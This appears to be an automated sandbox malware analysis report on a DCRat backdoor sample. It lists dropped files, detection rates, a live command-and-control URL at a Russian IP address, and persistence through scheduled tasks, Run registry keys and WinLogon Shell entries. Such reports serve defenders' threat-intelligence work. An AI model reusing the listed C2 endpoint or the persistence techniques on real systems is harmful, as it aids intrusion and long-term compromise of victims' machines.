                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Recovery\RuntimeBroker.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\Desktop\BKcXESYN.log8%ReversingLabs
                      C:\Users\user\Desktop\BgcwUNOc.log8%ReversingLabs
                      C:\Users\user\Desktop\BxjPijIe.log8%ReversingLabs
                      C:\Users\user\Desktop\DNOFZBcI.log8%ReversingLabs
                      C:\Users\user\Desktop\DvHnLgjG.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\FGdoLyOG.log29%ReversingLabs
                      C:\Users\user\Desktop\FPAovlhD.log17%ReversingLabs
                      C:\Users\user\Desktop\FoaFqfIX.log5%ReversingLabs
                      C:\Users\user\Desktop\GbeNbtEV.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\IIQWghSC.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\IeQwxcIQ.log21%ReversingLabs
                      C:\Users\user\Desktop\LgDeSLNM.log8%ReversingLabs
                      C:\Users\user\Desktop\LqWvJvsp.log6%ReversingLabs
                      C:\Users\user\Desktop\LyGNneTv.log9%ReversingLabs
                      C:\Users\user\Desktop\MUHnEZJK.log9%ReversingLabs
                      C:\Users\user\Desktop\PTVdvIcA.log12%ReversingLabs
                      C:\Users\user\Desktop\QKxdLVJD.log29%ReversingLabs
                      C:\Users\user\Desktop\RHZlgVYy.log4%ReversingLabs
                      C:\Users\user\Desktop\RjzUmbxe.log12%ReversingLabs
                      C:\Users\user\Desktop\SWHMRrhv.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                      C:\Users\user\Desktop\UPWuCoSt.log6%ReversingLabs
                      C:\Users\user\Desktop\VMyCYnho.log21%ReversingLabs
                      C:\Users\user\Desktop\VZqLtXxX.log17%ReversingLabs
                      C:\Users\user\Desktop\WDaDoBOr.log8%ReversingLabs
                      C:\Users\user\Desktop\XACLJBdm.log17%ReversingLabs
                      C:\Users\user\Desktop\XbctOGCS.log21%ReversingLabs
                      C:\Users\user\Desktop\YKVbAlIQ.log21%ReversingLabs
                      C:\Users\user\Desktop\aVrcADnQ.log4%ReversingLabs
                      C:\Users\user\Desktop\bAMSHhIJ.log8%ReversingLabs
                      C:\Users\user\Desktop\crpSXvpM.log12%ReversingLabs
                      C:\Users\user\Desktop\cvDcQhTg.log3%ReversingLabs
                      C:\Users\user\Desktop\dLiSHAoK.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\eqGsIhxV.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\fmuTYeTZ.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\hKwJyjHA.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\iyARkwDy.log3%ReversingLabs
                      C:\Users\user\Desktop\jdYrkeMJ.log17%ReversingLabs
                      C:\Users\user\Desktop\kZMRAajN.log17%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\Desktop\kvbZFwSt.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\lWnZWaxI.log17%ReversingLabs
                      C:\Users\user\Desktop\nuBirctr.log12%ReversingLabs
                      C:\Users\user\Desktop\ordqNcIm.log5%ReversingLabs
                      C:\Users\user\Desktop\pMdQdXyB.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\qJFYyXNw.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\rcIHUqTf.log17%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\Desktop\tevppZXa.log8%ReversingLabs
                      C:\Users\user\Desktop\wtLyrQzn.log12%ReversingLabs
                      C:\Users\user\Desktop\xlsyLrRW.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                      C:\Users\user\Desktop\yMEybVxl.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\yZwGwFNU.log17%ReversingLabs
                      C:\Users\user\Desktop\zXYOSFcP.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\zmagdNkm.log12%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV2.C:0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV20%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/Prod.C:0%Avira URL Cloudsafe
                      http://31.177.108.211/lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://31.177.108.211/lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.phptrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabQRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000018.00000002.3296971130.00000153AE666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoQRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000016.00000002.1928723824.000001DB59AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E81A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E5E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2.C:qmgr.db.44.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000002C.00000003.1956030705.0000025C8FE56000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2qmgr.db.44.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchQRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000016.00000002.1928723824.000001DB59AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E81A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E5E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.3296971130.00000153AE666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/pscore68powershell.exe, 00000016.00000002.1928723824.000001DB598B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380001000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name84JufgBTrA.exe, 00000000.00000002.1801490254.000000000343C000.00000004.00000800.00020000.00000000.sdmp, 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1928723824.000001DB598B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380001000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6qmgr.db.44.drfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      31.177.108.211
                      		unknownRussian Federation
                      		44053UNILINK-ASRUtrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1511007
                      Start date and time:2024-09-13 21:01:06 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:54
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:84JufgBTrA.exe
                      renamed because original name is a hash value
                      Original Sample Name:3c9cf0b38226e2a7f0191a0130536859.exe
                      Detection:MAL
                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@44/334@0/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target MaEiPrsQRasQLtRzJjb.exe, PID 7328 because it is empty
                      • Execution Graph export aborted for target MaEiPrsQRasQLtRzJjb.exe, PID 7660 because it is empty
                      • Execution Graph export aborted for target RuntimeBroker.exe, PID 7112 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: 84JufgBTrA.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:02:10API Interceptor153x Sleep call for process: powershell.exe modified
                      15:02:22API Interceptor1884509x Sleep call for process: MaEiPrsQRasQLtRzJjb.exe modified
                      15:02:25API Interceptor2x Sleep call for process: svchost.exe modified
                      20:02:07Task SchedulerRun new task: MaEiPrsQRasQLtRzJjb path: "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:07Task SchedulerRun new task: MaEiPrsQRasQLtRzJjbM path: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:07Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
                      20:02:07Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
                      20:02:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                      20:02:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                      20:02:54AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:03AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                      20:03:20AutostartRun: WinLogon Shell "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:28AutostartRun: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"
                      20:03:36AutostartRun: WinLogon Shell "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:45AutostartRun: WinLogon Shell "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:53AutostartRun: WinLogon Shell "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      UNILINK-ASRUGalaxy Swapper v2.0.3.exeGet hashmaliciousRedLineBrowse
                      • 31.177.108.53
                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                      • 31.177.108.29
                      KR6nDu9fLhop1bFe.exeGet hashmaliciousQuasarBrowse
                      • 31.177.108.29
                      k5kWDiia0s.elfGet hashmaliciousMirai, GafgytBrowse
                      • 95.174.91.180
                      hVRAoMLVTN.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 95.174.91.180
                      xFg36ZRw8k.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 95.174.91.180
                      D2QzGNEZhk.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 95.174.91.180
                      T8gCMqaA72.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 95.174.91.180
                      rAzw6F2np2.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 95.174.91.180
                      2kik39qqSw.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 95.174.91.180

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\Desktop\BKcXESYN.logeRZQCpMb4y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                          kIdT4m0aa4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            5R28W1PAnS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                TwfUz3FuO7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    Componentsession.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      -#U00bc).exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        Loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                          Created / dropped Files

                                          C:\Program Files (x86)\WindowsPowerShell\Configuration\557bb37d3fa657

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (444), with no line terminators
                                          Category:dropped
                                          Size (bytes):444
                                          Entropy (8bit):5.821018383420598
                                          Encrypted:false
                                          SSDEEP:12:6AOn0mez+OJFodQl9ykfcA1VIA0GWHWPsbRmcUM8HGFuK/:6n0t+cFXzsHWUbIM8Ip/
                                          MD5:2F9BD855D163FBA784B0C5858388B060
                                          SHA1:E50B34B5246433404F8A4506AE1859E98ADD74E1
                                          SHA-256:7D589D7FF8789813823FC5E7F0F8E8565BE153BE9EEE977B7AEF01E06C3E65A7
                                          SHA-512:633C7D28C7B3043B685C44E58532D5A76F0EEB964479CEDD4C64263D3C469FCD354A3FA00887AACCEF73A14C3F9715DAD2A6821D1FB1CA318B6F03688E0099C5
                                          Malicious:false
                                          Preview:05toMh34oiIr9gZDe9aAr3RBaiiXAaL3y9RezFVGvU0Sh3zK4TwSjHt6nrNo8f4OWO3AO5OYnTPXD9dgsXdqn2UqPV0H2rHPZl5TAz69FXoP2W3oOq6lCNkd3Mu3EGg6M97bDKg3bdlQOFy3bM3LufNLAcZyFC480sC2YblDKCKimUPyX0b2MVLqwvalvryYimZfC5fAk0BsVojqMkaOlCwfgWGmBARcOvA94uwbUbRWUdUIMuZKRjxg049qz29kiidkojvcy94JuZKCB8aQlHLp7dIAuGlccryvAudm86WRpnvbt6o1cs9bXymKbvrrXbrDlZCQeySou3ATrrQybuAurWXLHTLNPp4N6szU3YXnaVrdxTcte3Qmb7VOB0JKmEYF8wX9264DWWUWp3Yy0ctVYRv8XkSCOMBV6mfB5d0h9NQFn9jHcVTKVCqq

                                          C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
